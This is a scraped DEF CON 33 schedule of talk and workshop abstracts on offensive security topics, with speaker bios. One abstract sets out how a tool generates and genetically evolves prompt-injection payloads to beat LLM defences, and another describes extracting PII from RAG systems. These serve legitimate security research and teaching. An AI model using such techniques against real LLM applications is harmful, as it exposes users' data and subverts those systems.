BlackHat should send you an email with instructions for how to obtain your DEF CON badge. In case you missed it, you can go to the second floor, at the concierge desk, halfway down Black Hat Blvd.
Want to buy multiple badges? No problem! We're happy to sell you however many badges you want to pay for.
If you lose your badge, there is unfortunately no way for us to replace it. You'll have to buy a replacement at full price. Please don't lose your badge. :(
If you are being accompanied by a full-time caretaker (such as someone who will push your wheelchair, and will accompany you at all times), please ask to speak to a Registration Goon. Your caretaker will receive a paper badge that will permit them to accompany you everywhere you go.
If you have questions about anything regarding human registration that are not addressed here, please ask to speak to a Registration Goon.
- ics Calendar file
- ics Calendar file
This talk explores the hidden risks in apps leveraging modern AI systems—especially those using large language models (LLMs) and retrieval-augmented generation (RAG) workflows. We demonstrate how sensitive data, such as personally identifiable information (PII) and social security numbers, can be extracted through real-world attacks. We’ll demonstrate model inversion attacks targeting fine-tuned models, and embedding inversion attacks on vector databases among others. The point is to show how PII scanning tools fail to recognize the rich data that lives in these systems and how much of privacy disaster these AI ecosystems really are.
SpeakerBio: Patrick WalshPatrick Walsh has an over 20 year history of running threat research and engineering teams overseeing products ranging from anti-virus and intrusion prevention to enterprise cloud software. He is a long-time advocate for privacy and security and holds multiple patents in that space. Patrick now leads IronCore Labs, an application data protection platform that uses encryption to protect data stored in the cloud while keeping it searchable and usable. Outside of work, he enjoys the outdoors, photography, hacking, lock picking, biking, swimming, and magic.
- ics Calendar file
As AI advances, how will it impact the landscape of cybersecurity? Especially given that it can help both attackers and defenders, which side will AI help more? In this talk, I will talk about our recent work on Cybergym and Bountybench, evaluating AI agent capabilities in real world security challenges, where AI agents were able to autonomously discover 15 zero-days in widely distributed open source software and solve bounty tasks worth of tens of thousands of dollars. I will also discuss our work on analyzing how frontier AI will impact the landscape of cybersecurity and also our recently launched Frontier AI Cybersecurity Observatory, an open platform for the community to work together for continuous monitoring of AI capabilities in cyber security.
SpeakerBio: Dawn Song
- ics Calendar file
Please note: This two-day training will be offered on Saturday and Sunday (August 9-10). Participants will receive a DEF CON Human Badge with their registration
It is indeed all about the information. Information is power—and those who control it hold the reins. This course dives deep into the topic of Influence Operations (IO), teaching you how adversaries manipulate, deceive, and control the flow of information to achieve their objectives. From destabilizing governments to swaying elections and ruining careers, IO is a tool used by state and non-state actors alike. The question is, how do you defend against it?
In this fast-paced, hands-on course, we’ll break down how IO is planned, executed, and defended against. You’ll gain the skills and knowledge to not only recognize and counteract these operations but to protect yourself, your organization, and even your country from their impact.
What You'll Learn:
By the end of the course, you’ll not only have a deep understanding of how IO is executed, but you'll also walk away with practical tools to defend against these attacks. You’ll learn how to recognize the signs of manipulation, understand the motivations behind IO, and develop countermeasures to protect against them.
In a world where information is weaponized, knowing how to protect yourself is no longer optional. Whether you’re securing yourself, an organization, protecting a political campaign, or defending a nation, this course is your toolkit for navigating the complex and increasingly dangerous world of influence operations.
Speakers:Tom Cross,Greg ContiTom Cross is an entrepreneur and technology leader with three decades of experience in the hacker community. Tom attended the first DefCon in 1993 and he ran bulletin board systems and listservs in the early 1990’s that served the hacker community in the southeastern United States. He is currently an independent security consultant, Principal at Kopidion, and creator of FeedSeer, a news reader for Mastodon. Previously he was CoFounder and CTO of Drawbridge Networks, Director of Security Research at Lancope, and Manager of the IBM Internet Security Systems X-Force Advanced Research team. He has written papers on collateral damage in cyber conflict, vulnerability disclosure ethics, security issues in internet routers, encrypting open wireless networks, and protecting Wikipedia from vandalism. He has spoken at numerous security conferences, including Black Hat Briefings, Defcon, CyCon, HOPE, Source Boston, FIRST, and Security B-Sides. He has a B.S. in Computer Engineering from the Georgia Institute of Technology. He can be found on Linkedin as https://www.linkedin.com/in/tom-cross-71455/, and on Mastodon as https://ioc.exchange/@decius.
SpeakerBio: Greg Conti, Co-Founder and Principal at KopidionGreg Conti is a hacker, maker, and computer scientist. He is a nine-time DEF CON speaker, a seven-time Black Hat speaker, and has been a Black Hat Trainer for 10 years. He’s taught Adversarial Thinking techniques at West Point, Stanford University bootcamps, NSA/U.S. Cyber Command, and for private clients in the financial and cybersecurity sectors. Greg is Co-Founder and Principal at Kopidion, a cyber security training and professional services firm.
Formerly he served on the West Point faculty for 16 years, where he led their cybersecurity research and education programs. During his U.S. Army and Military Intelligence career he co-created U.S. Cyber Command’s Joint Advanced Cyberwarfare Course, deployed to Iraq as Officer-in-Charge of U.S. Cyber Command’s Expeditionary Cyber Support Element, and was the first Director of the Army Cyber Institute.
Greg is co-author of On Cyber: Towards an Operational Art for Cyber Operations, and approximately 100 articles and papers covering hacking, online privacy, usable security, cyber conflict, and security visualization. Greg holds a B.S. from West Point, an M.S. from Johns Hopkins University, and a Ph.D. from the Georgia Institute of Technology, all in computer science. His work may be found at gregconti.com (https://www.gregconti.com/), kopidion.com (https://www.kopidion.com/) and LinkedIn (https://www.linkedin.com/in/greg-conti-7a8521/).
- ics Calendar file
- ics Calendar file
In this workshop we will start from scratch with nothing more than a GCP project. The only requirement to participate in this workshop is a laptop with an internet connection. We will deploy a virtual machine, install and configure the Mythic C2 Server. We will deploy a virtual machine, deploy and configure the Nemesis offensive data enrichment pipeline and operator support system. We will deploy a mythic-connector to send data automatically from Mythic to Nemesis. We will compromise a vulnerable application and deploy a Mythic C2 agent to said application, then exfiltrate data. We will clone my custom fork of RAGnarok locally and process said data from Nemesis using local, offline AI LLM models. (This can also be done in the cloud but I won’t be providing cloud GPU instances for obvious reasons.) We will then use the insights from this data to compromise another more secure host.
Speakers:Gabi Joseph,Josh MillsapI have been Red Teaming for 4 years with an academic background in AI/ML.
SpeakerBio: Josh MillsapI am on the Red Team for Palo Alto Networks. I lead the development, automation, and AI efforts for the team.
- ics Calendar file
Kubernetes is now at the heart of modern infrastructure, yet offensive security content targeting real-world K8s exploitation is still underrepresented—even at DEF CON. K8sploitation: Hacking Kubernetes the Fun Way fills that gap by diving deep into hands‑on Kubernetes hacking techniques including privilege escalation, lateral movement, and control plane compromise. In this workshop, we set aside the buzzwords and focus on practical attacks and defenses drawn from real adversary tradecraft. Whether you’re a red teamer looking to understand how attackers think or a defender seeking to shore up your cluster’s security, you’ll gain invaluable insights through live demos, guided labs, and lessons learned from enterprise and government security operations. This session bridges cloud‑native technology with hands‑on offensive security training in a way that’s rare, relevant, and overdue.
Speakers:Marcelo Ribeiro,Jeff JordanMarcelo Ribeiro leads the Offensive Security Special Ops team at Hewlett Packard Enterprise (HPE) with 20+ years of cybersecurity experience across HPE, Microsoft, IBM, and the Brazilian Navy. A former Navy Officer, he helped build Brazil’s Naval Cybersecurity capabilities and led IBM’s DFIR practice in Latin America.
At HPE, Marcelo develops advanced offensive security programs, leveraging Kubernetes infrastructure and AI to enhance offensive operations and harden cyber defenses. He has presented at DEF CON 2024 and various security conferences, sharing expertise on red teaming, cloud security, and Kubernetes exploitation.
Recognized in the EC-Council CEH Hall of Fame (2023), Marcelo holds CISSP, CISM, OSCP, GXPN, GPEN, GWAPT, GAWN, GRID, GREM, GCIH, GCIA, and more. Passionate about pushing offensive security boundaries, he thrives on tackling new adversarial challenges in modern cloud environments.
SpeakerBio: Jeff Jordan, Hewlett Packard Enterprise (HPE)Jeff Jordan is a Lead Penetration Tester in the Product Security Office with over 13 years of experience at HPE. He began his career in UEFI validation before transitioning into offensive security, where he now leads technical penetration testing efforts across a wide product portfolio. His work focuses on identifying and mitigating security risks through ethical hacking and secure development practices. Jeff has hands-on experience testing Kubernetes-based platforms, including containerized Home Subscriber Server (HSS) products used in 4G infrastructure. He holds CEH and CCSP certifications and plays a key role in driving product security strategy and execution.
- ics Calendar file
Throughout our Red Team operations, we've focused our research on advancing techniques to gain direct access to physical memory and achieve execution with the highest privileges (Kernel-mode). This talk presents the current state of the art in stealthy post-exploitation, sharing innovative approaches and refined methodologies developed over recent years. Topics include: bypassing modern EDR solutions via physical memory access primitives, physical access techniques and advanced post-exploitation techniques in Windows systems. We will demonstrate how low-level access vectors often overlooked can enable persistent, undetectable control over targeted systems. The session is tailored for cybersecurity professionals interested in cutting-edge Red Team tactics and emerging hardware/software threats. Practical demos will be included, along with tools and methodologies applicable across multiple scenarios. This is a deeply technical talk, showcasing real world tradecraft and threat modeling beyond traditional offensive security.
References:
Red Team Operator and Security Researcher with over ten years of experience in offensive cybersecurity. Throughout his career, he has worked hands-on in assessing, exploiting and mitigating security vulnerabilities, developing proof-of-concepts, offensive and defensive tools, and conducting in-depth security research on commercial and proprietary solutions. His approach is based on a combination of applied research and real-world experience, emphasizing continuous learning and optimization of defense and attack strategies.
SpeakerBio: Borja "borjmz" MartinezComputer security has been a passion for him for as long as he can remember. He is self-taught and seeks to learn something new every day, both professionally and personally. Specialist with more than 9 years of experience in pentesting, Red Team and Research, having a highly versatile profile. He is also a CTF player.
- ics Calendar file
On Saturday, we have a timed competition from 10:30a-5:30pm on a new scenario. Each team/individual is given Kubernetes API access to a team-specific cluster for each flag. The team can capture flags and win points as they progress. A scoreboard tracks the teams’ current and final scores. In the event of a tie, the first team to achieve the score wins that tie. This is open to only 30 teams and only from Saturday 10:30am - 5:30pm Pacific.
- ics Calendar file
On Friday through Sunday, we have a non-competitive learning run, where you can go through the Kubernetes CTF scenario from a previous year. It has an available "cheat sheet" that shows you how to run through, start to finish! You can do this without the "cheat sheet" if you want a puzzle.
Each team/individual gets a Kubernetes cluster that contains a set of flags.
This is open to up to 30 teams and is available from Friday 12pm to Sunday 12pm Pacific.
We will support DEF CON players in the contest area during the following times: - Friday: 12:00-17:00 - Saturday: 10:00-17:00 - Sunday: 10:00-12:00
- ics Calendar file
BLE CTF is a series of Bluetooth Low Energy challenges in a capture-the-flag format. It was created to teach the fundamentals of interacting with and hacking Bluetooth Low Energy services. Each exercise, or flag, aims to interactively introduce a new concept to the user.
Over the past few years, BLE CTF has expanded to support multiple platforms and skill levels. Various books, workshops, training, and conferences have utilized it as an educational platform and CTF. As an open source, low-cost of entry, and expandable education solution, BLE CTF has helped progress Bluetooth security research.
This workshop will teach the fundamentals of interacting with and hacking Bluetooth Low Energy services. Each exercise, or flag, aims to interactively introduce a new concept to the user. For this workshop, we will undergo a series of exercises to teach beginner students new concepts and allow more seasoned users to try new tools and techniques. After completing this workshop, you should have a good solid understanding of how to interact with and hack on BLE devices in the wild.
Speakers:Ryan Holeman,Alek AmraniRyan Holeman resides in Austin, Texas, where he works as the CISO for Stability AI. He is currently pursuing a Ph.D. in cyber defense from Dakota State University. He has spoken at respected venues such as Black Hat, DEF CON, Lockdown, BSides, Ruxcon, Notacon, and Shmoocon. You can keep up with his current activity, open source contributions, and general news on his blog. His spare time is mostly spent digging into various network protocols, random hacking, creating art, and shredding local skateparks.
SpeakerBio: Alek AmraniAlek Amrani is bad at expense reports.
- ics Calendar file
Dive into the dynamic world of Open Source Intelligence (OSINT) with this quick workshop designed to give you a taste of practical online investigations and threat hunting. Led by a seasoned professional, this immersive session offers a condensed yet impactful introduction to essential OSINT techniques that you can use in your red teaming engagements.
Experience the power of hands-on learning as you engage in live demonstrations, exploring key concepts such as operational security (OpSec), advanced search engine queries, username and phone number lookups, social media reconnaissance, breached records analysis, network reconnaissance, historical records, and essential documentation, all within the span of this engaging workshop. Through interactive exercises and guided discussions, participants will gain a glimpse into the world of OSINT.
Who’s it for?
This training is suited for all individuals in any field with a keen interest in online investigations regardless of their experience level in OSINT
SpeakerBio: Mishaal KhanMishaal is a subject matter expert in cybersecurity, pentesting, privacy, Open Source Intelligence and social engineering and a frequent speaker on these topics at Universities and popular cybersecurity conferences like DEF CON, Black Hat, Wild West Hackin Fest, TEDx, and multiple BSides Security events.
Mishaal has worked with multinational companies for over 20 years, securing their networks and providing executive level consultancy as a CISO to manage risk and avoid breaches. He's the author of the book; The Phantom CISO, runs a cybersecurity practice as a vCISO and owns a privacy management and investigations firm.
- ics Calendar file
Lex Sleuther is an internal tool developed at CrowdStrike for detecting the script language of an unknown text file based purely on its contents. We derive a novel approach using lexer generators and ridge regression and develop the solution as a compact Rust binary with Python bindings. We compare our solution to the current state of the art and present CrowdStrike’s own findings of relative efficacy in the field. Lex Sleuther has been recently open sourced for everybody to use.
SpeakerBio: Aaron "KNOX" JamesAaron has been the tooling guy for over 13 years, when he first wrote hacks for his favorite games. He still writes hacking tools, but now for security companies.
- ics Calendar file
Capture the flag for beginners to advanced.
- ics Calendar file
If you find something that seems to have been lost, please take that item to the nearest NFO Node. The item will enter the DEF CON Lost & Found system.
If you've lost something, the only way to check on it (or reclaim it) is by going to the Lost & Found department yourself. The Lost & Found department is in room LVCC - L2 - W238. You may also call Lost & Found at +1 (702) 477-5019.
The Lost & Found department plans to be open Thursday - Saturday, during all hours that the conference operates. On Sunday, the Lost & Found department will open with the venue at 08:00, but will close at the beginning of DEF CON 33 Closing Ceremonies (15:00). Shortly thereafter, all remaining lost items will be transferred to the LVCC. If you need to reach LVCC's Lost & Found, you may call LVCC Dispatch at +1 (702) 892-7400.
- ics Calendar file
Patrick Wardle is the founder of the Objective-See Foundation, the CEO/Cofounder of DoubleYou, and the author of "The Art of Mac Malware" book series. Having worked at NASA and the NSA, as well as presenting at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Passionate about macOS security, Patrick spends his days discovering Apple 0days, studying macOS malware, and releasing free open-source security tools to protect Mac users.
- ics Calendar file
In his final boss form "Houdinti", @intidc delivers an interactive magic show in which every trick is an actual live hack. During this spectacle, we're hacking several locks, biometrics, passwords, PIN codes & more! The show is suited for both beginners and pro's, who'll get the opportunity to take a guess on how the tricks work prior to them being revealed. Live hacking demonstrations will never be the same again.
SpeakerBio: Inti "intidc" De Ceukelaire, Chief Hacker Officer at IntigritiInti De Ceukelaire is a Belgian ethical hacker and cybercrime investigator. He currently works as the Chief Hacker Officer at Europe's largest vulnerability disclosure platform Intigriti, a founding member of the Hacker Policy Council. In 2018, Inti won the "Most Valuable Hacker" award at the largest live hacking event in Las Vegas.
With extensive experience in the field of security and ethical hacking, Inti has earned a reputation as a thought leader in the industry. His work and expertise have been featured in a variety of international publications, including the BBC, Wired, The Verge, CNET, Mashable, and New York Magazine. Inti has made global headlines through his security awareness pranks, which have included manipulating the Vatican's website, creating fake news on Donald Trump's Twitter account, and hacking Metallica. Through these high-profile stunts, Inti has drawn attention to the importance of cybersecurity and the need for individuals and organisations to be vigilant about potential threats. As an experienced and engaging speaker, Inti is able to make complex topics accessible to a wide audience. He has spoken at a variety of conferences and events, sharing insights on the latest trends in cybersecurity and offering practical tips to help individuals and organisations protect themselves from potential threats.
He is also a trusted source for media outlets seeking expert commentary on topics related to cybersecurity, hacking and technology.
- ics Calendar file
Michael Aguilar (v3ga) is a Principal Consultant for Sophos Red Team. He leads efforts in Medical Device testing, Adversarial Simulations, Physical Security assessments, Network testing and more. Currently, he has 8 CVE vulnerabilities aligned with security issues located during testing at DEF CON's Biohacking Village Device Lab. He has also led the winning team of the DEF CON Biohacking Village CTF for two consecutive years.
- ics Calendar file
- ics Calendar file
Join us for an in-depth exploration of how PDFs, a ubiquitous document format, can be exploited as a vessel for executing malicious JavaScript malware. This presentation will delve into real-world vulnerability that have been targeted to execute harmful code within PDF files—posing a serious threat in today's cybersecurity landscape.
Key exploit techniques we'll explore include:
Heap Spray Attacks: Using shellcode to strategically overwrite memory, thereby enabling attackers to execute arbitrary code and gain control over target systems.
Data Exfiltration Tactics: Methods for covertly extracting critical information, such as email addresses and system details, from users without their knowledge or consent. Embedding Malware in PDFs: An examination of how attackers embed harmful scripts into PDFs, tricking users into activating exploits within Adobe Reader through seemingly ordinary actions.
We'll dissect malicious actions such as shellcode injection, buffer overflow attacks, Adobe Reader exploit, and memory manipulation, all designed to execute malware effectively.
This session is perfect for offensive security professionals seeking to deepen their understanding of PDF-based exploits and enhance their penetration testing and threat emulation capabilities. Discover how these sophisticated threats operate and learn strategies to counteract them within your security frameworks. Join us to stay ahead in the ever-evolving world of cyber threats.
More information about the presentation you can find in this article - https://labs.senhasegura.blog/unmasking-the-threat-a-deep-dive-into-the-pdf-malicious-2/
SpeakerBio: Filipi PiresI’ve been working as Head of Identity Threat Labs and Global Product Advocate at Segura, Founder at Black&White Technology, Cybersecurity Advocate, Snyk Ambassador, Application Security Specialist and Hacking is NOT a crime Advocate. International Speaker at Security and New technologies events in many countries such as US, Canada, France, Spain, Germany, Poland, and others, I’ve served as University Professor in Graduation and MBA courses at Brazilian colleges, in addition, I'm Creator and Instructor of the Course - Malware Attack Types with Kill Chain Methodology (PentestMagazine), PowerShell and Windows for Red Teamers(PentestMagazine) and Malware Analysis - Fundamentals (HackerSec).
- ics Calendar file
npm is owned by Microsoft and is the world’s largest software registry. It hosts nearly 5 million packages and 4.5 trillion requests for packages were made to npm in 2024. The open and accessible nature of npm is one of its main features, but its also one of the reasons that threat actors are attracted to it. A recent study by Sonatype found that 98.5% of malicious software packages are hosted and delivered via npm.
This technical deep-dive will explain why npm is so good at delivering malware; expose how threat actors are using npm; and why existing security tools like SCA, SAST, EDR and anti-virus solutions will not protect you from npm based malware.
Key Topics:
Don't let Paul's baby face fool you, he has been working with engineering teams for 30 years. Paul's specialty is helping organizations build secure applications at scale. He's done that for large organizations like NASA, John Deere, Blue Cross/Blue Shield, US Army, and the Australian government. He's also built or worked for several startups along the way helping them do the same thing. Paul spent most of his career in Utah but now lives in Australia with his wife and 3 kids.
- ics Calendar file
In this talk, the speaker details how a threat actor’s OPSEC slip—testing their own keylogger and infostealer on their hacking machine—provided a real-time view into a cybercrime operation. By intercepting Telegram-based command-and-control (C2) communications, the speaker obtained hundreds of screenshots and keylogs of the threat actors desktop, revealing the entire cybercrime operation. The session also covers the creation of Telegram bot tokens, which were then embedded in malware to enable covert data exfiltration and remote control.
Through automated analysis techniques, including VirusTotal and custom YARA rules, the speaker tracked samples communicating with Telegram’s API, extracted thousands of bot tokens that were used to forward stolen data, used these to intercept communications, and mapped backend infrastructure through screenshots of the threat actors desktop. This process led to the discovery of links to broader phishing and malware campaigns, underscoring how trusted platforms like Telegram can be abused by malicious actors.
References:
SpeakerBio: Ben "polygonben" FollandBen Folland is a Security Operations Analyst at Huntress, where he manages hands-on-keyboard intrusions and dismantles active threats daily. Before that, he worked at one of Accenture’s SOCs, defending UK Critical National Infrastructure, gaining deep experience in high-stakes environments. He's all about DFIR, malware analysis, and threat hunting—and has a knack for exposing adversary tradecraft. Ben's spoken at over 10 conferences (including six BSides), taught SOC workshops at universities, is GIAC GCFA certified, and was a finalist for the UKs national cyber team. Whether it's CTFs or live incidents, Ben thrives on the chase and brings a hacker mindset to everything he does.
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive DEF CON Human Badge with their registration
The topic of the course is offensive security testing of medical devices and the impact this has on the future of medical device production. The course is a seasoned entry/mid level to advanced course. The students will be learning all that the trainers know about Medical Device hacking and the things they have learned in their interactions as testers with these devices. This is inclusive of skills such as:
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive DEF CON Human Badge with their registration
The topic of the course is offensive security testing of medical devices and the impact this has on the future of medical device production. The course is a seasoned entry/mid level to advanced course. The students will be learning all that the trainers know about Medical Device hacking and the things they have learned in their interactions as testers with these devices. This is inclusive of skills such as:
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive DEF CON Human Badge with their registration
The topic of the course is offensive security testing of medical devices and the impact this has on the future of medical device production. The course is a seasoned entry/mid level to advanced course. The students will be learning all that the trainers know about Medical Device hacking and the things they have learned in their interactions as testers with these devices. This is inclusive of skills such as:
- ics Calendar file
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive DEF CON Human Badge with their registration
The topic of the course is offensive security testing of medical devices and the impact this has on the future of medical device production. The course is a seasoned entry/mid level to advanced course. The students will be learning all that the trainers know about Medical Device hacking and the things they have learned in their interactions as testers with these devices. This is inclusive of skills such as:
- ics Calendar file
The DEF CON Memorial Chamber serves as a sacred space within our community — a place where we pause to honor those hackers whose brilliance and dedication have elevated not just our craft, but the entire security ecosystem. Here we remember figures whose generous spirit and willingness to coordinate security fixes demonstrated that true hacking greatness lies in collaboration. We are here because DEF CON has been the beating heart of the hacker community for over three decades, growing from 100 people in 1993 to the world's largest hacker conference. As Jeff Moss envisioned, DEF CON is what we make of it, this memorial space represents our commitment to ensuring that the legacy of those we've lost continues to inspire future generations of hackers to pursue knowledge, build community, and use their gifts to make the world better.
- ics Calendar file
Proxies, along with local, reverse, and dynamic forwards, enable red teams to maintain persistent access and move laterally within target environments. By combining these techniques, operators can construct sophisticated attack chains that enable deep network access through multiple segmented environments. This presentation will dive into the setup, usage, and attacker techniques required to be effective with proxies. To demonstrate these techniques, the presenters will use a publicly available tunneling toolkit, Messenger.
Speakers:Skyler Knecht,Kevin ClarkSkyler is a Senior Security consultant at SpecterOps, where he performs security assessments for Fortune 500 organizations. With over six years of experience, he focuses on initial access research and contributes to the security community through open-source development and conference presentations. Skyler has presented at DEF CON and BSides and actively collaborates on open-source projects such as Messenger, Ek47, Connect, and Metasploit. He also conducts vulnerability research, having discovered multiple zero-day vulnerabilities in enterprise software.
SpeakerBio: Kevin Clark, Red Team Instructor at BC SecurityKevin Clark is a Security Consultant with TrustedSec and a Red Team Instructor with BC Security, with a diverse background in software development, penetration testing, and offensive security operations. Kevin specializes in initial access techniques and Active Directory exploitation. He has contributed to open-source projects such as PowerShell Empire and developed custom security toolkits, including Badrats and Ek47. A skilled trainer and speaker, Kevin has delivered talks and conducted training sessions all over the country at cybersecurity conferences, including Black Hat and DEF CON, and authors a cybersecurity blog at https://henpeebin.com/kevin/blog.
- ics Calendar file
Bare metal cloud providers are rapidly gaining popularity among organizations deploying high-performance machine learning workloads. While the promise of dedicated hardware and enhanced security may appear attractive, a closer look revealed that these environments are vulnerable to decades-old attacks that are sure to trigger nostalgia.
This talk investigates the hidden risks posed by the "bare metal" trend, illustrating how weaknesses in firmware, hardware, and the network can lead to catastrophic multi-tenant compromise. We'll walk through real-world case examples demonstrating how attackers can leverage these vulnerabilities including hijacking provisioning processes, installing persistent firmware implants, intercepting sensitive network data, and compromising secure machine learning workflows.
Attendees will gain insight into the unique attack surfaces of bare metal environments, understand why seemingly outdated techniques remain highly effective, and learn how major cloud providers mitigate these threats. Expect technical demonstrations, practical advice on evaluating providers, and recommendations for protecting your organization's critical infrastructure.
References:
SpeakerBio: Bill DemirkapiBill is a security researcher with a passion for finding bugs at scale. His interests include reverse engineering and vulnerability research, ranging from low-level memory corruption to systemic flaws with catastrophic consequences. He started his journey in high school and has since published his work at internationally-recognized conferences like DEF CON and Black Hat USA. In his pursuit to make the world a better place, Bill constantly looks for the next significant vulnerability, following the motto "break anything and everything".
- ics Calendar file
Metasploit continues to expand support for Active Directory Certificate Services attacks, as well as its protocol relaying capability and attack workflows for evergreen vulnerabilities. This year, we added support for SMB-to-LDAP relaying and SMB-to-HTTP relaying, as well as support to identify and exploit a number of AD CS flaws. We’ve also added the new PoolParty process injection capability to Windows Meterpreter sessions, along with support for System Center Configuration Manager attack workflows.
Speakers:Spencer "ZeroSteiner" McIntyre,Jack HeyselSpencer is a senior security research manager at Rapid7, where he works on the Metasploit Framework. He has been contributing to Metasploit since 2010, a committer since 2014, and a core team member at Rapid7 since 2019. Previously, he worked at a consulting firm working with clients from various industries, including healthcare, energy, and manufacturing. He is an avid open source contributor and Python enthusiast.
SpeakerBio: Jack HeyselJack is a senior security researcher at Rapid7, where he contributes to and helps maintain the Metasploit Framework. He started at Rapid7 in 2016 working on their vulnerability management solution. He transitioned to the Metasploit team in 2021 and has been happily writing and reviewing exploits ever since. While AFK, he enjoys exploring the mountains and outdoors that surround his home.
- ics Calendar file
Metasploit continues to expand support for Active Directory Certificate Services attacks, as well as its protocol relaying capability and attack workflows for evergreen vulnerabilities. This year, we added support for SMB-to-LDAP relaying and SMB-to-HTTP relaying, as well as support to identify and exploit a number of AD CS flaws. We’ve also added the new PoolParty process injection capability to Windows Meterpreter sessions, along with support for System Center Configuration Manager attack workflows.
Speakers:Spencer "ZeroSteiner" McIntyre,Jack HeyselSpencer is a senior security research manager at Rapid7, where he works on the Metasploit Framework. He has been contributing to Metasploit since 2010, a committer since 2014, and a core team member at Rapid7 since 2019. Previously, he worked at a consulting firm working with clients from various industries, including healthcare, energy, and manufacturing. He is an avid open source contributor and Python enthusiast.
SpeakerBio: Jack HeyselJack is a senior security researcher at Rapid7, where he contributes to and helps maintain the Metasploit Framework. He started at Rapid7 in 2016 working on their vulnerability management solution. He transitioned to the Metasploit team in 2021 and has been happily writing and reviewing exploits ever since. While AFK, he enjoys exploring the mountains and outdoors that surround his home.
- ics Calendar file
Distributed data replication systems are more than just tools for redundancy—they’re fertile ground for creative abuse. In this talk, we explore how technologies like NFTs, IPFS, Codex, and Cloudflare R2 can become resilient C2 infrastructures, payload delivery systems, and phishing hosting that challenge takedown efforts. Welcome to the next phase of decentralized threats.
This sequel to “MFT: Malicious Fungible Tokens” explores how distributed data replication systems can be used for malicious purposes. We’ll demonstrate how technologies like Codex, WhenFS, IPFS, and Cloudflare R2 buckets can store and distribute C2 commands, payloads, and even phishing campaigns such as templates or client-side drainers. These systems enable infrastructures that are resistant to takedowns and, in some cases, nearly unstoppable. Through practical examples and live demonstrations, we’ll uncover the risks these systems pose and discuss their implications for security teams.
This talk is a continuation of "Everything is a C2 if you're brave enough" from Red Team Village and "MFT: Malicious Fungible Tokens" from Adversary Village, which explains how to turn NFTs into immortal C2 Servers. It is not needed to have attended these talks as a short recap will be featured.
Speakers:Mauro Eldritch,Nelson Colón
- ics Calendar file
Prompt injection is an emerging and poorly standardized attack vector targeting large language model applications. Unlike traditional vulnerabilities, there is no universal testing methodology or tooling, making it difficult for penetration testers to assess the security posture of LLM-integrated systems. Matrix Prompt Injection Tool aims to fill this gap by automating the generation of diverse prompt injection payloads. [1] Dynamic Input Detection: MPIT scans target websites to identify expected input fields where LLMs might process user requests. [2] Payload Enrichment: Each pattern includes crafted elements such as exploit strings, delimiters, and reasoning cues, enhancing the quality of the penetration test. [3] Genetic Algorithm Optimization: The tool employs a genetic algorithm to evolve and refine injection patterns, increasing their success rate significantly across different LLM defenses. [4] Practical Utility for Pentesters: MPIT is designed to support real-world offensive security assessments, making LLM-targeted testing more feasible and effective. ShinoLLMApps is a collection of vulnerable LLM web applications that use RAG and tools to help you test MPIT and better understand prompt injection and its risks. More info at github.com/Sh1n0g1/mpit and shinohack.me/shinollmapp.
Speakers:Shota "Sh1n0g1" Shinogi,Sasuke "Element138" KondoShota is a security researcher at Macnica, pentest tools author, and CTF organizer. He is an expert in writing tools for red team to evade the detection from EDR, sandbox, IPS, antivirus, and other security solutions. His malware simulator ShinoBOT and ShinoLocker contributes to the cybersecurity industry to help the people who want to test malwares safely. He has more than 15 years of experience in the cybersecurity industry, starting his career with HDD encryption, NAC, IPS, WAF, sandbox, EDR, and penetration testing. He has spoken in several security and hacking conferences, including Black Hat, DEF CON, and BSidesLV. He also contributes to the education for the next generation security engineers through the Security Camp from 2015 consecutively in Japan.
SpeakerBio: Sasuke "Element138" KondoSasuke is a high school developer with a growing focus on LLM security. While relatively new to cybersecurity, he approaches it with a builder’s mindset shaped by his experience creating web applications for real-world use, such as supporting school operations. His interest in LLM vulnerabilities began at the 2024 Japan Security Camp, where he started developing MPIT, the prompt injector he first presented at CODE BLUE 2024 and is now bringing to DEF CON. Outside cybersecurity, he is a two-time silver medalist in Japan Linguistics Olympiad and a recent participant in Japan Olympiad in AI.
- ics Calendar file
Operating with modern red team tools has a lot of ins, a lotta outs, a lotta what-have-yous. If you were like me before operating with tools like Mythic, managing your projects with Ghostwriter, and analyzing your data automatically with Nemesis, you were probably living in the past and piecing things together manually, writing things down in a tedious, un-zen lack-of-system that would leave you scrambling at the end of testing, when your report should be about to go to a peer review or QA.
You might be saying, "But Michael, I like doing things manually and wasting mine and my client's time." Yeah, well, you know, that's just, like, your opinion, man.
That is entering a world of pain. I don't know about you, but when that's happening, I feel really out of my element.
Luckily, Mythic, Ghostwriter, and Nemesis really tie the room together and are a huge quality-of-life boost. No more will you say to yourself, "This aggressor script will not stand, man!" Sometimes the bear eats you, but it's high time you eat the bear.
Get ready to be bowled away by a modern approach to managing your red team operations with tools like Mythic, Ghostwriter, and Nemesis (or whatever else you can think of to plug into these tools' APIs if you're note into the whole brevity thing) to streamline your workflow.
You might get so excited that you'll flail your arms around in joy - but be careful man, there's a beverage here!
SpeakerBio: Michael DonleyMichael is an Adversary Simulation Consultant at SpecterOps, where he deals in testing all the things - networks, web apps, Kubernetes clusters, humans, physical sites, and especially the potency of energy drinks.
He is the Director of Volunteers for the Red Team Village and loves helping people new to the field (especially career changers) find their foothold in the infosec industry.
When he's not hacking stuff or learning about new things, he is a drummer for just about any improv show in Chicago that has music in it.
- ics Calendar file
The maritime domain's vastness often masks hidden threats. This talk explores leveraging Open-Source Intelligence (OSINT) to enhance maritime security. We'll demonstrate practical, low-cost methods to gather and analyze publicly available data – including vessel tracking, port data, and social media – for identifying anomalous behaviors and predicting potential cyber-physical risks. Attendees will learn actionable techniques to build a proactive threat intelligence picture without specialized tools, providing crucial insights for defenders in this critical sector
Speakers:Mehmet Önder Key,Furkan AydoganÖnder Key is a cybersecurity consultant specializing in critical infrastructure security, zero-day vulnerability analysis, and offensive security. He has advised organizations in high-security sectors such as defense, aerospace, and finance, with hands-on experience in both red teaming and strategic security engineering. His work has been featured across numerous countries and platforms, contributing to the discovery of systemic vulnerabilities. Currently, he provides consultancy to Burkut, Ogrit, Ravenailabs and continues to advance the global offensive security ecosystem by challenging traditional approaches to cybersecurity.
